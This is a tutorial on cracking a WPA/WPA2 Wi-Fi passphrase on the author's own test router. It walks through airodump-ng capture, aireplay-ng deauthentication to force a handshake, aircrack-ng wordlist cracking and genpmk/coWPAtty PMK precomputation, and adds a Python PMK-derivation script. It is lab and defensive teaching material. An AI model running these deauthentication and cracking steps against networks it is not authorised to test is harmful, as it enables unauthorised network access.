One of the things that we will try out for breaking into WPA and WPA2 is a dictionary attack. A dictionary attack is a technique for defeating an authentication mechanism by trying to figure out its decryption key or passphrase through trying out hundreds, thousands or even billions of likely possibilities. The most vulnerable victims of this attack are Wi-Fi networks whose password is set to something simple, such as “cat”, “dog”, “airplane”, “football” and so on – in other words, words found in a dictionary.
Firstly we need to connect to our Access Point, set its wireless security to WPA/WPA2 and set its version to WPA-PSK. Since the point of this attack is to show the vulnerability of poor passwords, we will set our password to abcdefgh
Now let’s start up airodump again, and order it to only follow our router’s traffic with the following command:
airodump-ng --bssid <mac address here> --channel <number> --write <name of file> wlan1mon
The output of the command should show the familiar interface again, which lists all the devices connected to the router in the “STATION” column.
In order to perform the dictionary attack, we need to capture the four-way WPA handshake between a client and the router. You can get the handshake by just waiting for any new client to connect to the router, or you can send a deauthentication packet as a broadcast to force all clients to reconnect. Open up a new terminal window with CTRL + SHIFT + T and type in the following command to send a deauthentication packet:
aireplay-ng --deauth 1 -a <mac address of router> wlan1mon --ignore-negative-one
You can also target a specific device for deauthentication with the -c option (-c standing for client), followed by the client’s MAC address.
Now if you go back to the airodump tab, you can see on the top right that it has collected the WPA handshake, and has stored it in the WPAcracktest file that we created before.
You can confirm that the WPAcracktest pcap file has been created by typing in ls and checking that there is a <filename>-01.cap in the home directory.
Now that we have our pcap file with the WPA handshake, let’s open up Wireshark and, from the File menu in the top left corner, open WPAcracktest-01.cap or whatever you named it.
Now we can filter Wireshark to only show the four-way handshake by typing eapol in the filter bar. EAPOL stands for Extensible Authentication Protocol over LAN and is the encapsulation protocol that carries the handshake frames; the passphrase itself is never sent in them. In Wireshark’s Info column we can see that the capture contains all four messages of the handshake, labelled (Message 1 of 4), (Message 2 of 4) and so on.
Unfortunately Wireshark is unable to show us the key from the first login session. But now we will move on to the actual cracking part. As we stated before, a dictionary attack relies on the likely password already being written in the list. It won’t work that easily on passwords that have special characters or a lot of numbers, but if your list is comprehensive enough and contains hundreds of thousands or millions of different words and number combinations, you increase the likelihood that the crack produces a matching password.
Kali ships out of the box with many password lists, but for this exercise we chose to use the nmap.lst file. You may use any password list you want, but keep in mind that the list has to contain the actual password for this to work.
You can see how many password lists are just in the metasploit folder by typing the following command:
Now let’s use aircrack-ng with the pcap file containing the handshake and the password list. The crack tool will test each entry of the password list against the four-way handshake to find the correct password. Type in the following command to initiate the crack:
aircrack-ng <filename>-01.cap -w <file location>
Now aircrack-ng will start working through the password list and check whether any word on the list matches the handshake in the pcap file.
And the key was found! Keep in mind that if the word is not already written in the password list this won’t work. This is why it’s always recommended to have a safe password with numbers and special characters for your Wi-Fi, to prevent this kind of attack from happening.
With Aircrack-ng, every time you try to crack a Wi-Fi network with the dictionary attack, it uses processing power during the attack. If you use a massive dictionary list with numerous different password phrases, this might take a while. If you want to crack the same network multiple times there is a way to speed things up. We can precalculate the PSK/PMK with genpmk and coWPAtty.
In order to use genpmk to precalculate the password key, we will use the following command:
genpmk -f <file location> -d PMK-<routername> -s "<routername>"
Now that the genpmk has precalculated the nmap.lst password list, it’s time to use coWPAtty to compare the precalculated password list with the WPA handshake stored in the pcap file that we got earlier from the airodump-ng.
To begin processing the password list with cowpatty, type in the following command:
cowpatty -d PMK-<routername> -s "<routername>" -r <pcap file name>
And success! Here you can see the difference in speed between Aircrack-ng and coWPAtty. In our case Aircrack-ng handles around 3743.40 keys per second, whereas cowpatty processed 207375.88 keys per second.
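To see where that speed difference comes from, here is an added example (written for this page, not code from the original tutorial or from the aircrack-ng or coWPAtty projects) that reimplements the standard WPA/WPA2-PSK passphrase-to-PMK mapping with Python’s standard library. aircrack-ng has to run this derivation for every wordlist entry; genpmk runs it once per SSID and stores the result, which is the table cowpatty then reads. The SSIDs "ExampleRouter" and "OtherRouter" and the five-entry wordlist are constructed stand-ins for your router name and nmap.lst; the one real value is the test vector from the 802.11i specification (passphrase "password", SSID "IEEE").

```python
"""Added example, not from the original tutorial or the aircrack-ng/coWPAtty
projects: the passphrase-to-PMK step that aircrack-ng repeats for every
wordlist entry and that genpmk precomputes once per SSID.  Standard library only."""
import hashlib
import time

# Parameters fixed by the WPA/WPA2-PSK specification (IEEE 802.11).
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32          # 256-bit Pairwise Master Key
SHA1_OUTPUT_LEN = 20  # bytes per PBKDF2 output block


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).

    The SSID is the salt, which is why genpmk needs -s "<routername>" and why
    a table built for one network name is useless against another.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"),
        PBKDF2_ITERATIONS, PMK_LEN,
    )


def hmac_calls_per_candidate() -> int:
    """HMAC-SHA1 invocations hidden in one derive_pmk() call.

    PBKDF2 runs the full iteration count once per 20-byte output block and a
    32-byte PMK needs two blocks, so every wordlist entry costs 8192 HMACs
    before the handshake MIC (a handful more HMACs) can even be checked.
    """
    blocks = -(-PMK_LEN // SHA1_OUTPUT_LEN)  # ceil(32 / 20) = 2
    return blocks * PBKDF2_ITERATIONS


def build_pmk_table(ssid: str, wordlist) -> dict:
    """What genpmk -s <ssid> -f <wordlist> -d <out> produces, in miniature:
    a PMK -> passphrase map reusable against any handshake for this SSID
    without repeating the PBKDF2 work."""
    table = {}
    for line in wordlist:
        word = line.strip()
        if 8 <= len(word) <= 63:  # entries of invalid length are skipped, as the tools do
            table[derive_pmk(word, ssid)] = word
    return table


def measure_pmk_rate(ssid: str, candidates, seconds: float = 0.5) -> float:
    """Rough single-core PMK derivations per second: the figure aircrack-ng reports as k/s."""
    start = time.perf_counter()
    done = 0
    while time.perf_counter() - start < seconds:
        derive_pmk(candidates[done % len(candidates)], ssid)
        done += 1
    return done / (time.perf_counter() - start)


if __name__ == "__main__":
    # Constructed sample wordlist standing in for nmap.lst.
    SAMPLE_WORDLIST = ["password", "football", "abcdefgh", "cat", "12345678"]
    ssid = "ExampleRouter"  # assumed SSID, not from the tutorial
    table = build_pmk_table(ssid, SAMPLE_WORDLIST)
    print(f"{len(table)} PMKs precomputed for SSID {ssid!r} ('cat' skipped: too short)")
    # The tutorial's weak passphrase is in the list, so a lookup finds it at once.
    print("abcdefgh ->", table.get(derive_pmk("abcdefgh", ssid)))
    # Same passphrase, different SSID: a different PMK, so the table misses.
    print("lookup with another SSID ->", table.get(derive_pmk("abcdefgh", "OtherRouter")))
    print(f"{hmac_calls_per_candidate()} HMAC-SHA1 calls per candidate, "
          f"~{measure_pmk_rate(ssid, SAMPLE_WORDLIST):.0f} PMK/s in pure Python")
```

Two things follow from the code. Because the SSID salts the derivation, a precomputed table such as PMK-<routername> only matches networks with that exact name, so a non-default SSID forces an attacker back to the slow per-guess path. And because the per-candidate cost is fixed at 8192 HMAC-SHA1 operations, the only variable the defender controls is whether the passphrase appears in a wordlist at all: a passphrase like abcdefgh is found on the first pass, whereas one outside every list is never found regardless of how fast the tool runs.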